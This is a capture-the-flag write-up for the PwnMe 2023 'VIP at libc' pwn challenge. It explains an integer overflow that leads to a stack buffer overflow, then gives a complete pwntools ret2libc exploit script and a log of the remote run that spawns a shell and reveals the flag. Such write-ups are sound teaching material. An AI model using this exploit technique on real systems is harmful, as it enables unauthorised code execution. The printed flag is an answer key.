[pwnme 2023 - pwn] vip
VIP at libc
Sooo I heard that if you were VIP, you could access some specific features! Maybe one of those features can be used to get inside their system?
INFO : This challenge need to spawn an instance, you can connect to it with netcat: nc IP PORT
Author: Zerotistic#0001
Remote service at : nc 51.254.39.184 1335
VIP at libc is a basic stack based buffer overflow challenge. To trigger the large buffer overflow in the access_lounge
function, we have to trigger the int overflow within the buy_ticket
function. Then it is a classic ret2libc exploit, first we leak the address of puts
by calling puts(&puts@got)
, then we return to the main
function. Finally we call system("/bin/sh")
by triggering the bof the same way.
Final exploit
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfmate
import os
import time
import pwn
BINARY = "vip_at_libc"
LIBC = "/home/nasm/Documents/pwn/pwnme/vip/libc.so.6"
LD = "/home/nasm/Documents/pwn/pwnme/vip/ld-linux-x86-64.so.2"
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8 = pwn.p8
u8 = pwn.u8
host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return pwn.process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = pwn.connect(host, port)
if pwn.args.GDB:
pwn.gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if pwn.args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
'''.format(**locals())
def exp():
io = start()
io.sendlineafter(b"Your username: ", b"nasm")
io.sendlineafter(b"> \n", b"2")
io.sendlineafter(b"> \n", b"3")
io.sendlineafter(b"> \n", b"-99999")
io.sendlineafter(b"> \n", b"3")
io.sendlineafter(b"> \n", b"1")
io.sendlineafter(b"> \n", b"4")
rop = pwn.ROP(exe)
rop.call('puts', [exe.got.puts])
rop.call('main')
io.sendlineafter(b"> ", b"4"*0x18 + rop.chain())
io.recvuntil(b"want.\n\n\n")
libc.address = pwn.unpack(io.recvline().replace(b"\n", b"").ljust(8, b"\x00")) - 0x58ed0 - 0x28000
pwn.log.info(f"libc: {hex(libc.address)}")
io.sendlineafter(b"Your username: ", b"nasm")
io.sendlineafter(b"> \n", b"2")
io.sendlineafter(b"> \n", b"3")
io.sendlineafter(b"> \n", b"-99999")
io.sendlineafter(b"> \n", b"3")
io.sendlineafter(b"> \n", b"1")
io.sendlineafter(b"> \n", b"4")
rop_libc = pwn.ROP(libc)
rop_libc.call('system', [next(libc.search(b"/bin/sh\x00"))])
print(rop_libc.dump())
io.sendlineafter(b"> ", b"4"*0x18 + pwn.p64(rop.ret.address) + rop_libc.chain())
io.interactive()
if __name__ == "__main__":
exp()
"""
nasm@off:~/Documents/pwn/pwnme/vip$ python3 exploit.py REMOTE HOST=51.254.39.184 PORT=1335
[*] '/home/nasm/Documents/pwn/pwnme/vip/vip_at_libc'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
RUNPATH: b'/home/nasm/Documents/pwn/pwnme/vip'
[*] '/home/nasm/Documents/pwn/pwnme/vip/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] '/home/nasm/Documents/pwn/pwnme/vip/ld-linux-x86-64.so.2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 51.254.39.184 on port 1335: Done
[*] Loaded 6 cached gadgets for 'vip_at_libc'
[*] libc: 0x7fdf08902000
[*] Loaded 218 cached gadgets for '/home/nasm/Documents/pwn/pwnme/vip/libc.so.6'
0x0000: 0x7fdf0892c3e5 pop rdi; ret
0x0008: 0x7fdf08ada698 [arg0] rdi = 140595900032664
0x0010: 0x7fdf08952d60 system
[*] Switching to interactive mode
Your lounge 444444444444444444444444\x1a@ has been created!
You can access it whenever you want.
$ cat flag.txt
PWNME{OOO0h_yoU_4re_V1P_4ND_g0t_sh3LL_w1th_LIBC??!!_S0_strong!!!e5b2cf}
"""